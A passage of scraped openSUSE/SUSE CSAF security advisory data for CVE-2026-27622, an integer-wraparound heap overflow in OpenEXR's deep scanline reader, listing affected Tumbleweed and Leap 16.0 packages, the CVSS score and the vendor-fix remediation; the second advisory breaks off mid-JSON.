"text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector\u003cunsigned int\u003e total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-27622",
"url": "https://www.suse.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "SUSE Bug 1259177 for CVE-2026-27622",
"url": "https://bugzilla.suse.com/1259177"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-27622"
}
]
}
OPENSUSE-SU-2026:20433-1
Vulnerability from csaf_opensuse - Published: 2026-03-26 10:03 - Updated: 2026-03-26 10:03| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:openexr-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:openexr-devel-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Leap 16.0:openexr-doc-3.2.2-160000.5.1.noarch | — |
Vendor Fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for openexr",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for openexr fixes the following issue:\n\n- CVE-2026-27622: crafted multipart deep EXR can cause an heap out-of-bound write (bsc#1259177).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Leap-16.0-450",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_20433-1.json"
},
{
"category": "self",
"summary": "SUSE Bug 1259177",
"url": "https://bugzilla.suse.com/1259177"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-27622 page",
"url": "https://www.suse.com/security/cve/CVE-2026-27622/"
}
],
"title": "Security update for openexr",
"tracking": {
"current_release_date": "2026-03-26T10:03:06Z",
"generator": {
"date": "2026-03-26T10:03:06Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:20433-1",
"initial_release_date": "2026-03-26T10:03:06Z",
"revision_history": [
{
"date": "2026-03-26T10:03:06Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"product": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"product_id": "libIex-3_2-31-3.2.2-160000.5.1.aarch64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"product": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"product_id": "libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"product": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"product_id": "libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"product": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"product_id": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"product": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"product_id": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64"
}
},
{
"category": "product_version",
"name": "openexr-3.2.2-160000.5.1.aarch64",
"product": {
"name": "openexr-3.2.2-160000.5.1.aarch64",
"product_id": "openexr-3.2.2-160000.5.1.aarch64"
}
},
{
"category": "product_version",
"name": "openexr-devel-3.2.2-160000.5.1.aarch64",
"product": {
"name": "openexr-devel-3.2.2-160000.5.1.aarch64",
"product_id": "openexr-devel-3.2.2-160000.5.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
